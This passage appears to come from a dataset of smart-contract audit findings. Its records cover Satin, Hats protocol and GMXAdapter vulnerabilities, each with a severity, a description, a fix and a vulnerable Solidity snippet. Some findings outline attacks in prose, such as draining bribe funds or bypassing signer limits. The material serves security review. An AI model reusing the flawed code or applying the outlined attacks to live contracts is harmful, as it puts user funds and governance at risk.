In contrast, a user that performs one action a week would only receive rewards for the locking duration minus minLockDurationForRewardчThe variable weekCursor should be used instead of oldUserPoint.ts in the if condition:\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n```\\nчч```\\n if ((lockEndTime - oldUserPoint.ts) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n -Users will be unable to claim emissions from veSatin tokens if they withdraw it or merge itчhighчThe function `_calculateClaim()` uses the variable lockEndTime when checking if a veSatin is entitled to emissions for a particular week (code with mitigation from TRST-H-1):\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nHowever lockEndTime is set to 0 whenever a user withdraws a veSatin by calling `withdraw()` or merges one by calling `merge()`. When this is the case the operation lockEndTime - weekCursor underflows, thus reverting. This results in users being unable to claim veSatin emissions if they withdraw or merge it firstчIn the `withdraw()` and `merge()` functions, call `claim()` in VeDist.sol to claim emissions before setting the lock end timestamp to 0. 
In `merge()` this is only necessary for the veSatin passed as _fromчч```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n -It's never possible to vote for new pools until setMaxVotesForPool() is calledчhighчThe function `_vote()` allows voting on a pool only when the current amount of votes plus the new votes is lower or equal to the value returned by _calculateMaxVotePossible():\\n```\\n require(_poolWeights <= _calculateMaxVotePossible(_pool), \"Max votes exceeded\");\\n```\\n\\nHowever, `_calculateMaxVotePossible()` returns 0 for every pool in which the variable maxVotesForPool has not been initialized, thus making `_vote()` revert:\\n```\\n return ((totalVotingPower * maxVotesForPool[_pool]) / 100);\\n```\\nчIn `createGauge()` and `createGauge4Pool()` set maxVotesForPool for the pool the gauge is being created for to 100.чч```\\n require(_poolWeights <= _calculateMaxVotePossible(_pool), \"Max votes exceeded\");\\n```\\n -The protocol might transfer extra SATIN emissions to veSatin holders potentially making SatinVoter.sol insolventчhighчThe function `_distribute()` in SatinVoter.sol is generally responsible for distributing weekly emissions to a gauge based on the percentage of total votes the associated pool received. In particular, it's called by `updatePeriod()` (as per fix TRST-H-4) on the gauge associated with the Satin / $CASH pool. 
The variable veShare is set to be equal to the returned value of `calculateSatinCashLPVeShare()`, which is calculated as the percentage of Satin / $CASH LP times claimable[gauge] and represents the amount of SATIN that will be transferred to VeDist.sol when checkpointing emissions in checkpointEmissions():\\n```\\n uint _claimable = claimable[_gauge];\\n if (SATIN_CASH_LP_GAUGE == _gauge) {\\n veShare = calculateSatinCashLPVeShare(_claimable);\\n _claimable -= veShare;\\n }\\n if (_claimable > IMultiRewardsPool(_gauge).left(token) && _claimable / DURATION > 0) {\\n claimable[_gauge] = 0;\\n if (is4poolGauge[_gauge]) {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, true);\\n } else {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, false);\\n }\\n emit DistributeReward(msg.sender, _gauge, _claimable);\\n }\\n```\\n\\nHowever, when the if condition (_claimable > IMultiRewardsPool(_gauge).left(token) && _claimable / DURATION > 0) is false the variable claimable[_gauge] will not be set to 0, meaning the next time veShare will be calculated it will include emissions that have already been distributed, potentially making SatinVoter.sol insolventчAdjust claimable[gauge] after calculating veShare and calculate veShare only if the msg.sender is SatinMinter.sol to prevent potential attackers from manipulating the value by repeatedly calling _distribute():\\n```\\n if (SATIN_CASH_LP_GAUGE == _gauge && msg.sender == minter) {\\n veShare = calculateSatinCashLPVeShare(_claimable);\\n claimable[_gauge] -= veShare;\\n _claimable -= veShare;\\n }\\n```\\nчч```\\n uint _claimable = claimable[_gauge];\\n if (SATIN_CASH_LP_GAUGE == _gauge) {\\n veShare = calculateSatinCashLPVeShare(_claimable);\\n _claimable -= veShare;\\n }\\n if (_claimable > IMultiRewardsPool(_gauge).left(token) && _claimable / DURATION > 0) {\\n claimable[_gauge] = 0;\\n if (is4poolGauge[_gauge]) {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, true);\\n } else {\\n 
IGauge(_gauge).notifyRewardAmount(token, _claimable, false);\\n }\\n emit DistributeReward(msg.sender, _gauge, _claimable);\\n }\\n```\\n -It's possible to drain all the funds from ExternalBribeчhighчThe function `earned()` is used to calculate the amount of rewards owed to a tokenId, to do so it performs a series of operations over a loop and then it always executes:\\n```\\n Checkpoint memory cp = checkpoints[tokenId][_endIndex];\\n uint _lastEpochStart = _bribeStart(cp.timestamp);\\n uint _lastEpochEnd = _lastEpochStart + DURATION;\\n if (block.timestamp > _lastEpochEnd) {\\n reward += (cp.balanceOf * \\n tokenRewardsPerEpoch[token][_lastEpochStart]) /\\n supplyCheckpoints[getPriorSupplyIndex(_lastEpochEnd)].supply;\\n```\\n\\nwhich adds to reward the amount of rewards earned by the tokenId during the last epoch in which it was used to vote, but only if that happened at least a week prior (block.timestamp > _lastEpochEnd). Because of this, it's possible to call `earned()` multiple times in a row with a tokenId that voted more than a week before to drain the contract funds.чThe function `earned()` is taken from the Velodrome protocol and is known to have issues. 
Because it uses the convoluted logic of looping over votes to calculate the rewards per epoch instead of looping over epochs, we recommend using the Velodrome fixed implementation, which we reviewed:\\n```\\n function earned(address token, uint tokenId) public view returns (uint) {\\n if (numCheckpoints[tokenId] == 0) {\\n return 0;\\n }\\n uint reward = 0;\\n uint _ts = 0;\\n uint _bal = 0;\\n uint _supply = 1;\\n uint _index = 0;\\n uint _currTs = _bribeStart(lastEarn[token][tokenId]); // take epoch last claimed in as starting point\\n _index = getPriorBalanceIndex(tokenId, _currTs);\\n _ts = checkpoints[tokenId][_index].timestamp;\\n _bal = checkpoints[tokenId][_index].balanceOf;\\n // accounts for case where lastEarn is before first checkpoint\\n _currTs = Math.max(_currTs, _bribeStart(_ts));\\n // get epochs between current epoch and first checkpoint in same epoch as last claim\\n uint numEpochs = (_bribeStart(block.timestamp) - _currTs) / DURATION;\\n if (numEpochs > 0) {\\n for (uint256 i = 0; i < numEpochs; i++) {\\n // get index of last checkpoint in this epoch\\n _index = getPriorBalanceIndex(tokenId, _currTs + DURATION);\\n // get checkpoint in this epoch\\n _ts = checkpoints[tokenId][_index].timestamp;\\n _bal = checkpoints[tokenId][_index].balanceOf;\\n // get supply of last checkpoint in this epoch\\n _supply = supplyCheckpoints[getPriorSupplyIndex(_currTs + DURATION)].supply;\\n reward += _bal * tokenRewardsPerEpoch[token][_currTs] / _supply;\\n _currTs += DURATION;\\n }\\n }\\n return reward;\\n }\\n```\\nчч```\\n Checkpoint memory cp = checkpoints[tokenId][_endIndex];\\n uint _lastEpochStart = _bribeStart(cp.timestamp);\\n uint _lastEpochEnd = _lastEpochStart + DURATION;\\n if (block.timestamp > _lastEpochEnd) {\\n reward += (cp.balanceOf * \\n tokenRewardsPerEpoch[token][_lastEpochStart]) /\\n supplyCheckpoints[getPriorSupplyIndex(_lastEpochEnd)].supply;\\n```\\n -Division by 0 can freeze emissions claims for veSatin holdersчmediumчThe function 
`_calculateClaim()` is responsible for the calculations of the amount of emissions a specific veSatin is entitled to claim. In doing so, this code is executed (code with mitigation from TRST-H-1):\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nThe variable veSupply[weekCursor] is used as a denominator without checking if it's 0, which could make the function revert. If the protocol ever reaches a state where veSupply[weekCursor] is 0, all the claims for veSatin that were locked during that week would fail for both past and future claims. The same issue is present in the function `_calculateEmissionsClaim()`чEnsure veSupply[weekCursor] is not 0 when performing the division.чч```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n -BaseV1Pair could break because of overflowчmediumчIn the function _update(), called internally by `mint()`, `burn()` and `swap()`, the following code is executed:\\n```\\n uint256 timeElapsed = blockTimestamp - blockTimestampLast;\\n // overflow is desired\\n if (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n reserve0CumulativeLast += _reserve0 * timeElapsed;\\n reserve1CumulativeLast += _reserve1 * timeElapsed;\\n }\\n```\\n\\nThis is forked from UniswapV2 source code, and it's meant and known to overflow. It works fine if solidity < 0.8.0 is used but reverts when solidity >= 0.8.0 is used. 
If this happens all the core functionalities of the pool would break, including `mint()`, `burn()`, and `swap()`.чWrap the operation around an unchecked{} block so that when the variable overflows it loops back to 0 instead of reverting.чч```\\n uint256 timeElapsed = blockTimestamp - blockTimestampLast;\\n // overflow is desired\\n if (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n reserve0CumulativeLast += _reserve0 * timeElapsed;\\n reserve1CumulativeLast += _reserve1 * timeElapsed;\\n }\\n```\\n -createGauge4Pool() lacks proper checks and/or access controlчmediumчThe function createGauge4Pool() can be called by anybody at any time and is used to create a Gauge for a special pool, the 4pool. It takes 5 parameters as inputs:\\n```\\n function createGauge4pool(\\n address _4pool,\\n address _dai,\\n address _usdc,\\n address _usdt,\\n address _cash\\n ) external returns (address) {\\n```\\n\\nNone of the parameters are properly sanitized, meaning _dai, _usdc, _usdt, _cash could be any whitelisted token and not necessarily DAI, USDC, USDT, and cash while _4pool could be any custom contract, including a malicious one. The function also sets the variable FOUR_POOL_GAUGE_ADDRESS to the newly created gauge, overwriting the previous value.чMake the function only callable by an admin, and if it can be called multiple times, turn the variable FOUR_POOL_GAUGE_ADDRESS to a mapping from address to boolean to support multiple 4 pools.чч```\\n function createGauge4pool(\\n address _4pool,\\n address _dai,\\n address _usdc,\\n address _usdt,\\n address _cash\\n ) external returns (address) {\\n```\\n -The logic in _calculateClaim() can leave some tokens locked and waste gasчlowчThe function `_calculateClaim()` is responsible for the calculations of the amount of emissions a specific veSatin is entitled to claim. 
To do so, this code is executed in a loop for each week from the current timestamp to the last claim (code with mitigation from TRST-H-1):\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nWhen the if condition is not met two things happen:\\nAn amount of emissions that was supposed to be distributed ((balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor])) is skipped, meaning it will stay locked in the contract.\\nThe function `_calculateClaim()` will loop for the maximum number of times (50), because weekCursor is not increased, wasting users' gas.чWhen the if condition is not met burn the tokens that were supposed to be distributed and exit the loop. Since the non-distributed tokens would stay locked it's not strictly necessary to burn them.чч```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n -More than one hat of the same hatId can be assigned to a userчhighчHats are minted internally using `_mintHat()`.\\n```\\n /// @notice Internal call to mint a Hat token to a wearer\\n /// @dev Unsafe if called when `_wearer` has a non-zero balance of `_hatId`\\n /// @param _wearer The wearer of the Hat and the recipient of the newly minted token\\n /// @param _hatId The id of the Hat to mint\\n function _mintHat(address _wearer, uint256 _hatId) internal {\\n unchecked {\\n // should not overflow since `mintHat` enforces max balance of 1\\n _balanceOf[_wearer][_hatId] = 1;\\n // increment Hat supply counter\\n // should not overflow given AllHatsWorn check in `mintHat` ++_hats[_hatId].supply;\\n }\\n emit TransferSingle(msg.sender, address(0), _wearer, _hatId, 1);\\n }\\n```\\n\\nAs documentation states, it is unsafe if _wearer already has the hatId. 
However, this could easily be the case when called from `mintHat()`.\\n```\\n function mintHat(uint256 _hatId, address _wearer) public returns (bool) {\\n Hat memory hat = _hats[_hatId];\\n if (hat.maxSupply == 0) revert HatDoesNotExist(_hatId);\\n // only the wearer of a hat's admin Hat can mint it\\n _checkAdmin(_hatId);\\n if (hat.supply >= hat.maxSupply) {\\n revert AllHatsWorn(_hatId);\\n }\\n if (isWearerOfHat(_wearer, _hatId)) {\\n revert AlreadyWearingHat(_wearer, _hatId);\\n }\\n _mintHat(_wearer, _hatId);\\n return true;\\n }\\n```\\n\\nThe function validates _wearer doesn't currently wear the hat, but its balance could still be over 0, if the hat is currently toggled off or the wearer is not eligible. The impact is that the hat supply is forever spent, while nobody actually received the hat. This could be used maliciously or occur by accident. When the hat is immutable, the max supply can never be corrected for this leak. It could be used to guarantee no additional, unfriendly hats can be minted to maintain permanent power.чInstead of checking if user currently wears the hat, check if its balance is over 0.чч```\\n /// @notice Internal call to mint a Hat token to a wearer\\n /// @dev Unsafe if called when `_wearer` has a non-zero balance of `_hatId`\\n /// @param _wearer The wearer of the Hat and the recipient of the newly minted token\\n /// @param _hatId The id of the Hat to mint\\n function _mintHat(address _wearer, uint256 _hatId) internal {\\n unchecked {\\n // should not overflow since `mintHat` enforces max balance of 1\\n _balanceOf[_wearer][_hatId] = 1;\\n // increment Hat supply counter\\n // should not overflow given AllHatsWorn check in `mintHat` ++_hats[_hatId].supply;\\n }\\n emit TransferSingle(msg.sender, address(0), _wearer, _hatId, 1);\\n }\\n```\\n -TXs can be executed by less than the minimum required signaturesчhighчIn HatsSignerGateBase, `checkTransaction()` is the function called by the Gnosis safe to approve the transaction. 
Several checks are in place.\\n```\\n uint256 safeOwnerCount = safe.getOwners().length;\\n if (safeOwnerCount < minThreshold) {\\n revert BelowMinThreshold(minThreshold, safeOwnerCount);\\n }\\n```\\n\\n```\\n uint256 validSigCount = countValidSignatures(txHash, signatures, signatures.length / 65);\\n // revert if there aren't enough valid signatures\\n if (validSigCount < safe.getThreshold()) {\\n revert InvalidSigners();\\n }\\n```\\n\\nThe first check is that the number of owners registered on the safe is at least minThreshold. The second check is that the number of valid signatures (wearers of relevant hats) is not below the safe's threshold. However, it turns out these requirements are not sufficient. A possible situation is that there are plenty of owners registered, but currently most do not wear a hat. `reconcileSignerCount()` could be called to reduce the safe's threshold to the current validSigCount, which can be below minThreshold. That would make both the first and second check succeed. However, minThreshold is defined to be the smallest number of signers that must come together to make a TX. The result is that a single signer could execute a TX on the safe, if the other signers are not wearers of hats (for example, their toggle has been temporarily set off in the case of multi-hat signer gate.чAdd another check in `checkTransaction()`, which states that validSigCount >= minThreshold.чч```\\n uint256 safeOwnerCount = safe.getOwners().length;\\n if (safeOwnerCount < minThreshold) {\\n revert BelowMinThreshold(minThreshold, safeOwnerCount);\\n }\\n```\\n -Target signature threshold can be bypassed leading to minority TXsчhighч`checkTransaction()` is the enforcer of the HSG logic, making sure signers are wearers of hats and so on. 
The check below makes sure sufficient hat wearers signed the TX:\\n```\\n uint256 validSigCount = countValidSignatures(txHash, signatures, signatures.length / 65);\\n // revert if there aren't enough valid signatures\\n if (validSigCount < safe.getThreshold()) {\\n revert InvalidSigners();\\n }\\n```\\n\\nThe issue is that the safe's threshold is not guaranteed to be up to date. For example, initially there were 5 delegated signers. At some point, three lost eligibility. `reconcileSignerCount()` is called to update the safe's threshold to now have 2 signers. At a later point, the three signers which lost eligibility regained it. At this point, the threshold is still two, but there are 5 valid signers, so if targetThreshold is not below 5, they should all sign for a TX to be executed. That is not the case, as the old threshold is used. There are various scenarios which surface the lack of synchronization between the wearer status and safe's stored threshold.чCall `reconcileSignerCount()` before the validation code in `checkTransaction()`.чч```\\n uint256 validSigCount = countValidSignatures(txHash, signatures, signatures.length / 65);\\n // revert if there aren't enough valid signatures\\n if (validSigCount < safe.getThreshold()) {\\n revert InvalidSigners();\\n }\\n```\\n -maxSigners can be bypassedчhighчmaxSigners is specified when creating an HSG and is left constant. It is enforced in two ways -targetThreshold may never be set above it, and new signers cannot register to the HSG when the signer count reached maxSigners. 
Below is the implementation code in HatsSignerGate.\\n```\\n function claimSigner() public virtual {\\n if (signerCount == maxSigners) {\\n revert MaxSignersReached();\\n }\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n _grantSigner(msg.sender);\\n }\\n```\\n\\nAn issue that arises is that this doesn't actually limit the number of registered signers. Indeed, signerCount is a variable that can fluctuate when wearers lose eligibility or a hat is inactive. At this point, `reconcileSignerCount()` can be called to update the signerCount to the current valid wearer count. A simple attack which achieves unlimited claims is as follows:\\nAssume maxSigners = 10\\n10 signers claim their spot, so signerCount is maxed out\\nA signer misbehaves, loses eligibility and the hat.\\nreconcile() is called, so signerCount is updated to 9\\nA new signer claims, making signerCount = 10\\nThe malicious signer behaves nicely and regains the hat.\\nreconcile() is called again, making signerCount = 11\\nAt this point, any eligible hat wearer can claim their hat, easily overrunning the maxSigners restriction.чThe root cause is that users which registered but lose their hat are still stored in the safe's owners array, meaning they can always get re-introduced and bump the signerCount. Instead of checking the signerCount, a better idea would be to compare with the list of owners saved on the safe. 
If there are owners that are no longer holders, `removeSigner()` can be called to vacate space for new signers.чч```\\n function claimSigner() public virtual {\\n if (signerCount == maxSigners) {\\n revert MaxSignersReached();\\n }\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n _grantSigner(msg.sender);\\n }\\n```\\n -Attacker can DOS minting of new top hats in low-fee chainsчmediumчIn Hats protocol, anyone can be assigned a top hat via the `mintTopHat()` function. The top hats are structured with top 32 bits acting as a domain ID, and the lower 224 bits are cleared. There are therefore up to 2^32 = ~ 4 billion top hats. Once they are all consumed, `mintTopHat()` will always fail:\\n```\\n // uint32 lastTopHatId will overflow in brackets\\n topHatId = uint256(++lastTopHatId) << 224;\\n```\\n\\nThis behavior exposes the project to a DOS vector, where an attacker can mint 4 billion top hats in a loop and make the function unusable, forcing a redeploy of Hats protocol. This is unrealistic on ETH mainnet due to gas consumption, but definitely achievable on the cheaper L2 networks. As the project will be deployed on a large variety of EVM blockchains, this poses a significant risk.чRequire a non-refundable deposit fee (paid in native token) when minting a top hat. Price it so that consuming the 32-bit space will be impossible. This can also serve as a revenue stream for the Hats project.чч```\\n // uint32 lastTopHatId will overflow in brackets\\n topHatId = uint256(++lastTopHatId) << 224;\\n```\\n -Linking of hat trees can freeze hat operationsчmediumчHats support tree-linking, where hats from one node link to the first level of a different domain. This way, the amount of levels for the linked-to tree increases by the linked-from level count. 
This is generally fine, however lack of checking of the new total level introduces severe risks.\\n```\\n /// @notice Identifies the level a given hat in its hat tree\\n /// @param _hatId the id of the hat in question\\n /// @return level (0 to type(uint8).max)\\n function getHatLevel(uint256 _hatId) public view returns (uint8) {\\n```\\n\\nThe `getHatLevel()` function can only return up to level 255. It is used by the `checkAdmin()` call used in many of the critical functions in the Hats contract. Therefore, if for example, 17 hat domains are joined together in the most stretched way possible, it would result in a correct hat level of 271, making this calculation revert:\\n```\\n if (treeAdmin != 0) {\\n return 1 + uint8(i) + getHatLevel(treeAdmin);\\n }\\n```\\n\\nThe impact is that intentional or accidental linking that creates too many levels would freeze the higher hat levels from any interaction with the contract.чIt is recommended to add a check in `_linkTopHatToTree()`, that the new accumulated level can fit in uint8. 
Another option would be to change the maximum level type to uint32.чч```\\n /// @notice Identifies the level a given hat in its hat tree\\n /// @param _hatId the id of the hat in question\\n /// @return level (0 to type(uint8).max)\\n function getHatLevel(uint256 _hatId) public view returns (uint8) {\\n```\\n -Attacker can make a signer gate creation failчmediumчDAOs can deploy a HSG using `deployHatsSignerGateAndSafe()` or deployMultiHatsSignerGateAndSafe().The parameters are encoded and passed to moduleProxyFactory.deployModule():\\n```\\n bytes memory initializeParams = abi.encode(_ownerHatId, _signersHatId, _safe, hatsAddress, _minThreshold, \\n _targetThreshold, _maxSigners, version );\\n hsg = moduleProxyFactory.deployModule(hatsSignerGateSingleton, abi.encodeWithSignature(\"setUp(bytes)\", \\n initializeParams), _saltNonce );\\n```\\n\\nThis function will call createProxy():\\n```\\n proxy = createProxy( masterCopy, keccak256(abi.encodePacked(keccak256(initializer), saltNonce)) );\\n```\\n\\nThe second parameter is the generated salt, which is created from the initializer and passed saltNonce. Finally `createProxy()` will use CREATE2 to create the contract:\\n```\\n function createProxy(address target, bytes32 salt) internal returns (address result)\\n {\\n if (address(target) == address(0)) revert ZeroAddress(target);\\n if (address(target).code.length == 0) revert \\n TargetHasNoCode(target);\\n bytes memory deployment = abi.encodePacked(\\n hex\"602d8060093d393df3363d3d373d3d3d363d73\", target, hex\"5af43d82803e903d91602b57fd5bf3\" );\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n result := create2(0, add(deployment, 0x20), \\n mload(deployment), salt)\\n }\\n if (result == address(0)) revert TakenAddress(result);\\n }\\n```\\n\\nAn issue could be that an attacker can frontrun the creation TX with their own creation request, with the same parameters. 
This would create the exact address created by the CREATE2 call, since the parameters and therefore the final salt will be the same. When the victim's transaction would be executed, the address is non-empty so the EVM would reject its creation. This would result in a bad UX for a user, who thinks the creation did not succeed. The result contract would still be usable, but would be hard to track as it was created in another TX.чUse an ever-increasing nonce counter to guarantee unique contract addresses.чч```\\n bytes memory initializeParams = abi.encode(_ownerHatId, _signersHatId, _safe, hatsAddress, _minThreshold, \\n _targetThreshold, _maxSigners, version );\\n hsg = moduleProxyFactory.deployModule(hatsSignerGateSingleton, abi.encodeWithSignature(\"setUp(bytes)\", \\n initializeParams), _saltNonce );\\n```\\n -Signers can backdoor the safe to execute any transaction in the future without consensusчmediumчThe function `checkAfterExecution()` is called by the safe after signer's request TX was executed (and authorized). It mainly checks that the linkage between the safe and the HSG has not been compromised.\\n```\\n function checkAfterExecution(bytes32, bool) external override {\\n if (abi.decode(StorageAccessible(address(safe)).getStorageAt(uint256(GUARD_STORAGE_SLOT), 1), (address))\\n != address(this)) \\n {\\n revert CannotDisableThisGuard(address(this));\\n }\\n if (!IAvatar(address(safe)).isModuleEnabled(address(this))) {\\n revert CannotDisableProtectedModules(address(this));\\n }\\n if (safe.getThreshold() != _correctThreshold()) {\\n revert SignersCannotChangeThreshold();\\n }\\n // leave checked to catch underflows triggered by re-erntry\\n attempts\\n --guardEntries;\\n }\\n```\\n\\nHowever, it is missing a check that no new modules have been introduced to the safe. When modules execute TXs on a Gnosis safe, the guard safety callbacks do not get called. As a result, any new module introduced is free to execute whatever it wishes on the safe. 
It constitutes a serious backdoor threat and undermines the HSG security model.чCheck that no new modules have been introduced to the safe, using the `getModulesPaginated()` utility.чч```\\n function checkAfterExecution(bytes32, bool) external override {\\n if (abi.decode(StorageAccessible(address(safe)).getStorageAt(uint256(GUARD_STORAGE_SLOT), 1), (address))\\n != address(this)) \\n {\\n revert CannotDisableThisGuard(address(this));\\n }\\n if (!IAvatar(address(safe)).isModuleEnabled(address(this))) {\\n revert CannotDisableProtectedModules(address(this));\\n }\\n if (safe.getThreshold() != _correctThreshold()) {\\n revert SignersCannotChangeThreshold();\\n }\\n // leave checked to catch underflows triggered by re-erntry\\n attempts\\n --guardEntries;\\n }\\n```\\n -createHat does not detect MAX_LEVEL admin correctlyчlowчIn `createHat()`, the contract checks user is not minting hats for the lowest hat tier:\\n```\\n function createHat( uint256 _admin, string memory _details, uint32 _maxSupply, address _eligibility,\\n address _toggle, bool _mutable, string memory _imageURI) \\n public returns (uint256 newHatId) {\\n if (uint8(_admin) > 0) {\\n revert MaxLevelsReached();\\n }\\n ….\\n }\\n```\\n\\nThe issue is that it does not check for max level correctly, as it looks only at the lowest 8 bits. Each level is composed of 16 bits, so ID xx00 would pass this check. Fortunately, although the check is passed, the function will revert later. The call to `getNextId(_admin)` will return 0 for max-level admin, and _checkAdmin(0) is guaranteed to fail. 
However, the check should still be fixed as it is not exploitable only by chance.чChange the conversion to uint16.чч```\\n function createHat( uint256 _admin, string memory _details, uint32 _maxSupply, address _eligibility,\\n address _toggle, bool _mutable, string memory _imageURI) \\n public returns (uint256 newHatId) {\\n if (uint8(_admin) > 0) {\\n revert MaxLevelsReached();\\n }\\n ….\\n }\\n```\\n -Incorrect imageURI is returned for hats in certain casesчlowчFunction `getImageURIForHat()` should return the most relevant imageURI for the requested hatId. It will iterate backwards from the current level down to level 0, and return an image if it exists for that level.\\n```\\n function getImageURIForHat(uint256 _hatId) public view returns (string memory) {\\n // check _hatId first to potentially avoid the `getHatLevel` call\\n Hat memory hat = _hats[_hatId];\\n string memory imageURI = hat.imageURI; // save 1 SLOAD\\n // if _hatId has an imageURI, we return it\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // otherwise, we check its branch of admins\\n uint256 level = getHatLevel(_hatId);\\n // but first we check if _hatId is a tophat, in which case we fall back to the global image uri\\n if (level == 0) return baseImageURI;\\n // otherwise, we check each of its admins for a valid imageURI\\n uint256 id;\\n // already checked at `level` above, so we start the loop at `level - 1`\\n for (uint256 i = level - 1; i > 0;) {\\n id = getAdminAtLevel(_hatId, uint8(i));\\n hat = _hats[id];\\n imageURI = hat.imageURI;\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // should not underflow given stopping condition is > 0\\n unchecked {\\n --i;\\n }\\n }\\n // if none of _hatId's admins has an imageURI of its own, we \\n again fall back to the global image uri\\n return baseImageURI;\\n }\\n```\\n\\nIt can be observed that the loop body will not run for level 0. 
When the loop is finished, the code just returns the baseImageURI, which is a Hats-level fallback, rather than top hat level fallback. As a result, the image displayed will not be correct when querying for a level above 0, when all levels except level 0 have no registered image.чBefore returning the baseImageURI, check if level 0 admin has a registered image.чч```\\n function getImageURIForHat(uint256 _hatId) public view returns (string memory) {\\n // check _hatId first to potentially avoid the `getHatLevel` call\\n Hat memory hat = _hats[_hatId];\\n string memory imageURI = hat.imageURI; // save 1 SLOAD\\n // if _hatId has an imageURI, we return it\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // otherwise, we check its branch of admins\\n uint256 level = getHatLevel(_hatId);\\n // but first we check if _hatId is a tophat, in which case we fall back to the global image uri\\n if (level == 0) return baseImageURI;\\n // otherwise, we check each of its admins for a valid imageURI\\n uint256 id;\\n // already checked at `level` above, so we start the loop at `level - 1`\\n for (uint256 i = level - 1; i > 0;) {\\n id = getAdminAtLevel(_hatId, uint8(i));\\n hat = _hats[id];\\n imageURI = hat.imageURI;\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // should not underflow given stopping condition is > 0\\n unchecked {\\n --i;\\n }\\n }\\n // if none of _hatId's admins has an imageURI of its own, we \\n again fall back to the global image uri\\n return baseImageURI;\\n }\\n```\\n -Fetching of hat status may fail due to lack of input sanitizationчlowчThe functions `_isActive()` and `_isEligible()` are used by `balanceOf()` and other functions, so they should not ever revert. 
However, they perform ABI decoding from external inputs.\\n```\\n function _isActive(Hat memory _hat, uint256 _hatId) internal view returns (bool) {\\n bytes memory data = \\n abi.encodeWithSignature(\"getHatStatus(uint256)\", _hatId);\\n (bool success, bytes memory returndata) = \\n _hat.toggle.staticcall(data);\\n if (success && returndata.length > 0) {\\n return abi.decode(returndata, (bool));\\n } else {\\n return _getHatStatus(_hat);\\n }\\n }\\n```\\n\\nIf toggle returns invalid return data (whether malicious or by accident), `abi.decode()` would revert causing the entire function to revert.чWrap the decoding operation for both affected functions in a try/catch statement. Fall back to the `_getHatStatus()` result if necessary. Checking that returndata size is correct is not enough as bool encoding must be a 32-byte ABI-encoded 0 or 1.чч```\\n function _isActive(Hat memory _hat, uint256 _hatId) internal view returns (bool) {\\n bytes memory data = \\n abi.encodeWithSignature(\"getHatStatus(uint256)\", _hatId);\\n (bool success, bytes memory returndata) = \\n _hat.toggle.staticcall(data);\\n if (success && returndata.length > 0) {\\n return abi.decode(returndata, (bool));\\n } else {\\n return _getHatStatus(_hat);\\n }\\n }\\n```\\n -Attacker can take over GMXAdapter implementation contractчlowчGMXAdapter inherits from BaseExchangeAdapter. It is an implementation contract for a transparent proxy and has the following initializer:\\n```\\n function initialize() external initializer {\\n __Ownable_init();\\n }\\n```\\n\\nTherefore, an attacker can call initialize() on the implementation contract and become the owner. At this point they can do just about anything to this contract, but it has no impact on the proxy as it is using separate storage. If there was a delegatecall coded in GMXAdapter, attacker could have used it to call an attacker's contract and execute the SELFDESTRUCT opcode, killing the implementation. 
With no implementation, the proxy itself would not be functional until it is updated to a new implementation. It is ill-advised to allow anyone to have control over implementation contracts as future upgrades may make the attack surface exploitable.чThe standard approach is to call from the constructor the _disableInitializers() from Open Zeppelin's Initializable moduleчч```\\n function initialize() external initializer {\\n __Ownable_init();\\n }\\n```\\n -disordered fee calculated causes collateral changes to be inaccurateчhighч`_increasePosition()` changes the Hedger's GMX position by sizeDelta amount and collateralDelta collateral. There are two collateralDelta corrections - one for swap fees and one for position fees. Since the swap fee depends on up-to-date collateralDelta, it's important to calculate it after the position fee, contrary to the current state. In practice, it may lead to the leverage ratio being higher than intended as collateralDelta sent to GMX is lower than it should be.\\n```\\n if (isLong) {\\n uint swapFeeBP = getSwapFeeBP(isLong, true, collateralDelta);\\n collateralDelta = (collateralDelta * (BASIS_POINTS_DIVISOR + swapFeeBP)) / BASIS_POINTS_DIVISOR;\\n }\\n // add margin fee\\n // when we increase position, fee always got deducted from collateral\\n collateralDelta += _getPositionFee(currentPos.size, sizeDelta, currentPos.entryFundingRate);\\n```\\nчFlip the order of `getSwapFeeBP()` and `_getPositionFee()`.чч```\\n if (isLong) {\\n uint swapFeeBP = getSwapFeeBP(isLong, true, collateralDelta);\\n collateralDelta = (collateralDelta * (BASIS_POINTS_DIVISOR + swapFeeBP)) / BASIS_POINTS_DIVISOR;\\n }\\n // add 